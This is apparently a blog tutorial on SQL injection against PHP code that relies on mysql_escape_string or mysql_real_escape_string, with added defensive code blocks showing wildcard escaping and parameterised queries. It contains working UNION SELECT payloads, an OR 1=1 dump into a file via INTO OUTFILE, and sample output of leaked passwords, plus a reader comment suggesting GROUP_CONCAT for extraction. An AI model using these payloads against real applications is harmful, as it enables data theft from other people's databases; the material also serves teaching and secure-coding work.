Bypassing PHP security (mysql_escape_string): SQL injection is still possible

Hello again. In the previous tutorial we saw how attackers can bypass PHP authentication using simple tricks. In fact, hacking is a game of tricks: the more you play, the more you gain.

Now let's play with mysql_escape_string. Developers assume that dropping in mysql_escape_string keeps attackers away. Here is a guide, for developers and hackers alike, to how this security measure is violated.

First of all, take a look at how it is used in the program, on line 17 of the code included in this article.

Now let's check how to bypass this security.

In general: string mysql_escape_string(string $unescaped_string). This function escapes the unescaped_string so that it is safe to place it in a mysql_query().

First of all, mysql_escape_string() does not take a connection argument and does not respect the current charset setting; it suffers from the same flaw as addslashes() and can be exploited in the same manner.

mysql_escape_string() does not escape % and _. One manifestation of this is injection into the LIKE clause of a query: the escaped value is quote-safe but is still interpreted as a pattern.
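Because neither escaping function touches % or _, a search term such as "%" matches every row even when the quoting is correct. The following is an added example, not code from the original article: a small wildcard escaper beside the weak and corrected search functions. The `$pdo` connection and the `users` table are assumed.

```php
<?php
// Added example, not code from the original article.
// Neither mysql_escape_string() nor mysql_real_escape_string() touches % or _,
// so a term like "%" or "a_" reaches LIKE as a pattern rather than as text.

// Escape the LIKE metacharacters (and the escape character itself) so the
// user's term matches literally. Backslash is MySQL's default ESCAPE character.
function escapeLikeTerm(string $term): string
{
    return addcslashes($term, '\\%_');
}

// Weak: the term is quote-safe (it is bound, not interpolated) but is still a
// pattern. A term of "%" returns every user; "a_" matches any two-letter prefix.
function searchUsersWeak(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare("SELECT id, username FROM users WHERE username LIKE ?");
    $stmt->execute([$term . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Corrected: the only wildcard left in the pattern is the trailing % we append.
function searchUsersByPrefix(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare("SELECT id, username FROM users WHERE username LIKE ?");
    $stmt->execute([escapeLikeTerm($term) . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: show the literal pattern the database will receive.
foreach (['acid', '%', 'a_', '50%\\off'] as $term) {
    printf("%-10s -> %s\n", $term, escapeLikeTerm($term) . '%');
}
```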

According to the manual: string mysql_real_escape_string(string $unescaped_string [, resource $link_identifier]).
Escapes special characters in the unescaped_string, taking into account the current character set of the connection, so that it is safe to place it in a mysql_query(). This function must always be used (with few exceptions) to make data safe before sending a query to MySQL.

In reality, mysql_real_escape_string is there to escape strings and prevent SQL injection on string variables.

Again,

In reality, mysql_real_escape_string is used to escape strings and prevent SQL injection on string variables.

Note the keywords.

Numeric variables are not protected and can be exploited for SQL injection even when passed to mysql_real_escape_string.

i.e.

[code]
'          --> \'
don't      --> don\'t
1 OR 1=1   --> 1 OR 1=1
[/code]

Now, the actual exploitation:

Suppose we have this table.

[code]
mysql> SELECT * FROM users;
+----+--------------+-----------+------------------+
| id | username     | password  | email            |
+----+--------------+-----------+------------------+
|  1 | acidburn     | 3rdegre3  | ab@itshacked.com |
|  2 | zerocool     | 0kewl     | zc@itshacked.com |
|  3 | lordnikon    | c4mera    | ln@itshacked.com |
|  4 | cerealkiller | fr00tl00p | ck@itshacked.com |
+----+--------------+-----------+------------------+
4 rows in set (0.00 sec)
[/code]

And this table.

[code]
mysql> SELECT * FROM notes;
+----+---------+--------------------------+
| id | user_id | content                  |
+----+---------+--------------------------+
|  1 |       2 | i hate acid burn         |
|  2 |       3 | two words: davinci virus |
|  3 |       1 | i hate crash override    |
|  4 |       4 | am i on bsd or lsd?      |
+----+---------+--------------------------+
4 rows in set (0.00 sec)
[/code]

And this query, with "protection":

[code]
// The id is compared as a bare number: there are no quotes around the value,
// so there is nothing for mysql_real_escape_string() to neutralise.
$query = "SELECT * FROM users WHERE id = " . mysql_real_escape_string($user_id);
[/code]

Exploiting an integer variable.

[code]
mysql> SELECT * FROM users WHERE id = 1;
+----+----------+----------+------------------+
| id | username | password | email            |
+----+----------+----------+------------------+
|  1 | acidburn | 3rdegre3 | ab@itshacked.com |
+----+----------+----------+------------------+
1 row in set (0.00 sec)

GOOD
[/code]

Worthless:

[code]
// The payload contains no quote characters, so it passes through the
// escaping function unchanged and becomes part of the SQL statement.
$query = "SELECT * FROM users WHERE id = "
       . mysql_real_escape_string("1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1");
[/code]

The query returns:

[code]
mysql> SELECT * FROM users WHERE id = 1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1;
+----+----------+-----------------------+------------------+
| id | username | password              | email            |
+----+----------+-----------------------+------------------+
|  1 | acidburn | 3rdegre3              | ab@itshacked.com |
|  3 | 1        | i hate crash override | NULL             |
+----+----------+-----------------------+------------------+
2 rows in set (0.00 sec)

BAD
[/code]
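The defect is in the query, not in the escaping function: `id = ...` has no quotes, so a value without quote characters passes straight through. As an added example (not code from the original article), here is that builder beside two fixes: validate the value as an integer before interpolating it, or bind it as a typed parameter with PDO. The `$db` / `$pdo` connections and the `users` table are assumed; `mysqli::real_escape_string()` stands in for the removed `mysql_real_escape_string()`.

```php
<?php
// Added example, not code from the original article.
// Vulnerable: the escaper neutralises quote characters only. The id is not
// quoted, so "1 UNION SELECT ..." reaches the query text unchanged.
function buildUserQueryEscapedOnly(mysqli $db, string $userId): string
{
    return "SELECT * FROM users WHERE id = " . $db->real_escape_string($userId);
}

// Fix 1: accept only a plain string of digits before it reaches the query.
// Anything containing a space, keyword or comma is rejected.
function buildUserQueryValidated(string $userId): string
{
    if (!ctype_digit($userId)) {
        throw new InvalidArgumentException("user id must be an unsigned integer");
    }
    return "SELECT * FROM users WHERE id = " . (int) $userId;
}

// Fix 2 (preferred): parameterised query. The value travels separately from
// the SQL text and is typed as an integer, so no input can alter the statement.
function fetchUserPrepared(PDO $pdo, string $userId): ?array
{
    $id = filter_var($userId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;   // not a positive integer: refuse rather than guess
    }
    $stmt = $pdo->prepare("SELECT id, username, email FROM users WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed input: the same payload the article uses above.
$payload = "1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1";
try {
    buildUserQueryValidated($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . PHP_EOL;
}
```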

UNION can help pull more data than what the original query would allow. In the previous example, we retrieved data from a separate table. We can also get more data from the same table.

[code]
mysql> SELECT id, username FROM users WHERE id = 1;
+----+----------+
| id | username |
+----+----------+
|  1 | acidburn |
+----+----------+
1 row in set (0.00 sec)

GOOD
[/code]

And the exploited query would be:

[code]
mysql> SELECT id, username FROM users WHERE id = 1 UNION SELECT password, email FROM users WHERE id = 1;
+----------+------------------+
| id       | username         |
+----------+------------------+
| 1        | acidburn         |
| 3rdegre3 | ab@itshacked.com |
+----------+------------------+
2 rows in set (0.00 sec)

BAD
[/code]

File I/O is important functionality for MySQL, especially for data import and export. SQL injection can abuse this functionality to widen the attack surface.

Consider this situation…
Want: Dump of users and notes.
Given: Application with arbitrary file disclosure and SQL injection (no protection).
Caveat: Application code only operates on first row of resultset (will not return full resultset).

[code]
SELECT *
FROM   users
WHERE  id = 1 OR 1=1
UNION SELECT id, user_id, content, 0 FROM notes
INTO OUTFILE '/tmp/users_notes.txt';
[/code]

WIN it 😉

[code]
$ cat users_notes.txt
1    acidburn        3rdegre3                    ab@itshacked.com
2    zerocool        0kewl                       zc@itshacked.com
3    lordnikon       c4mera                      ln@itshacked.com
4    cerealkiller    fr00tl00p                   ck@itshacked.com
1    2               i hate acid burn            0
2    3               two words: davinci virus    0
3    1               i hate crash override       0
4    4               am i on bsd or lsd?         0
[/code]

Oh my god!!! It’s damn easy!!!!!

In the next article we will learn about blind SQL injection attacks!! Stay tuned 😉

Please encourage me to keep writing with your questions and greetings in the comments below.

Sincerely thanks for reading 🙂

  • Great tut

  • Anonymous

    Nice tutorial.
    Can you explain it with a website? It will make it clearer.

  • Saket Theprince

    It won't work on websites because these are in quotes.

  • freeurmind111

    It's interesting, but instead of using INTO OUTFILE to get more results, which does not always work, it is easier to use GROUP_CONCAT on the columns of the query.